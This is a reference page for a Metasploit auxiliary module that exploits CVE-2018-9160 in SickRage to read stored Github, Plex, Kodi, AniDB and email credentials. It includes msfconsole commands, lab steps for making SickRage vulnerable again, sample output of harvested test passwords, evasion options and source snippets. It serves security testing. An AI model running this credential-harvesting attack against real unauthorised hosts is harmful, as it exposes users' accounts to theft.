HTTP SickRage Password Leak - Metasploit


This page contains detailed information about how to use the auxiliary/scanner/http/http_sickrage_password_leak metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: HTTP SickRage Password Leak
Module: auxiliary/scanner/http/http_sickrage_password_leak
Source code: modules/auxiliary/scanner/http/http_sickrage_password_leak.rb
Disclosure date: 2018-03-08
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8081, 8443, 8880, 8888
List of CVEs: CVE-2018-9160

SickRage < v2018-09-03 allows an attacker to view a user's saved Github credentials in HTTP responses unless the user has set login information for SickRage. By default, SickRage does not require login information for the installation.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use auxiliary/scanner/http/http_sickrage_password_leak
msf auxiliary(http_sickrage_password_leak) > show targets
    ... a list of targets ...
msf auxiliary(http_sickrage_password_leak) > set TARGET target-id
msf auxiliary(http_sickrage_password_leak) > show options
    ... show and set options ...
msf auxiliary(http_sickrage_password_leak) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Description


This module exploits a vulnerability in SickRage for versions under v2018-03-09. A simple GET request will return clear-text credentials for Github, Kodi, Plex, AniDB, etc. This exploit will only work if the user has not set credentials for the SickRage application. By default, SickRage credentials are not set.

Vulnerable Application


SickRage < v2018-03-09

Installation and Setup

The vulnerable versions of SickRage are no longer accessible, but the latest release can be made vulnerable with a few changes. The latest SickRage release for Windows can be found here.

Verification Steps


  1. Install the application
  2. Navigate to C:\SickRage\SickRage\gui\slick\views
  3. Open config_general.mako
  4. Find the input element with the name git_password
  5. Change the value from ${sickbeard.GIT_PASSWORD|hide} to ${sickbeard.GIT_PASSWORD}
  6. Save the changes
  7. Open config_anime.mako
  8. Find the input element with the name anidb_password
  9. Change the value from ${sickbeard.ANIDB_PASSWORD|hide} to ${sickbeard.ANIDB_PASSWORD}
  10. Save the changes
  11. Open config_notifications.mako
  12. Find the input element with the name kodi_password
  13. Change the value from ${sickbeard.KODI_PASSWORD|hide} to ${sickbeard.KODI_PASSWORD}
  14. Find the input element with the name plex_server_password
  15. Change the value from ${sickbeard.PLEX_SERVER_PASSWORD|hide} to ${sickbeard.PLEX_SERVER_PASSWORD}
  16. Find the input element with the name plex_client_password
  17. Change the value from ${sickbeard.PLEX_CLIENT_PASSWORD|hide} to ${sickbeard.PLEX_CLIENT_PASSWORD}
  18. Find the input element with the name email_password
  19. Change the value from ${sickbeard.EMAIL_PASSWORD|hide} to ${sickbeard.EMAIL_PASSWORD}
  20. Save the changes
  21. Start SickRage
  22. Start msfconsole
  23. Do: use [auxiliary/scanner/http/http_sickrage_password_leak]
  24. Do: set RHOSTS [IP]
  25. Do: run
  26. The credentials that the user has set should be printed to the screen

Scenarios


Tested on Windows 7 x86

  msf5 > use auxiliary/scanner/http/http_sickrage_password_leak
  msf5 auxiliary(scanner/http/http_sickrage_password_leak) > set RHOSTS 192.168.37.130
  RHOSTS => 192.168.37.130
  msf5 auxiliary(scanner/http/http_sickrage_password_leak) > run

  [+] git username: myUsername
  [+] git password: myPassword
  [+] anidb username: anidb
  [+] anidb password: anidbpass
  [+] plex_server username: plexu
  [+] plex_server password: plexp
  [+] plex_client username: plextu
  [+] plex_client password: plextp
  [+] Email username: [email protected]
  [+] Email password: sickragepass
  [*] Auxiliary module execution completed
  msf5 auxiliary(scanner/http/http_sickrage_password_leak) >

Go back to menu.

Msfconsole Usage


Here is how the scanner/http/http_sickrage_password_leak auxiliary module looks in the msfconsole:

msf6 > use auxiliary/scanner/http/http_sickrage_password_leak

msf6 auxiliary(scanner/http/http_sickrage_password_leak) > show info

       Name: HTTP SickRage Password Leak
     Module: auxiliary/scanner/http/http_sickrage_password_leak
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2018-03-08

Provided by:
  Sven Fassbender
  Shelby Pace

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      8081             yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       Optional path that gets prepended to the default paths to be searched
  VHOST                       no        HTTP server virtual host

Description:
  SickRage < v2018-09-03 allows an attacker to view a user's saved 
  Github credentials in HTTP responses unless the user has set login 
  information for SickRage. By default, SickRage does not require 
  login information for the installation.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2018-9160
  https://www.exploit-db.com/exploits/44545

Module Options


This is a complete list of options available in the scanner/http/http_sickrage_password_leak auxiliary module:

msf6 auxiliary(scanner/http/http_sickrage_password_leak) > show options

Module options (auxiliary/scanner/http/http_sickrage_password_leak):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8081             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Optional path that gets prepended to the default paths to be searched
   VHOST                       no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the scanner/http/http_sickrage_password_leak auxiliary module:

msf6 auxiliary(scanner/http/http_sickrage_password_leak) > show advanced

Module advanced options (auxiliary/scanner/http/http_sickrage_password_leak):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the scanner/http/http_sickrage_password_leak module can do:

msf6 auxiliary(scanner/http/http_sickrage_password_leak) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the scanner/http/http_sickrage_password_leak auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(scanner/http/http_sickrage_password_leak) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

SickRage is protected with authentication


Here is a relevant code snippet related to the "SickRage is protected with authentication" error message:

45:	      'uri'    => uri
46:	    )
47:	
48:	    # Improve this later: Add a loginscanner.
49:	    if res && res.headers['Location'] =~ /^\/login\//
50:	      raise RuntimeError, 'SickRage is protected with authentication'
51:	    end
52:	
53:	    unless res && res.code == 200
54:	      print_error("Unable to reach #{uri}")
55:	      return

Unable to reach <URI>


Here is a relevant code snippet related to the "Unable to reach <URI>" error message:

49:	    if res && res.headers['Location'] =~ /^\/login\//
50:	      raise RuntimeError, 'SickRage is protected with authentication'
51:	    end
52:	
53:	    unless res && res.code == 200
54:	      print_error("Unable to reach #{uri}")
55:	      return
56:	    end
57:	
58:	    res.get_html_document
59:	  end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Sven Fassbender
  • Shelby Pace

Version


This page has been produced using Metasploit Framework version 6.1.36-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.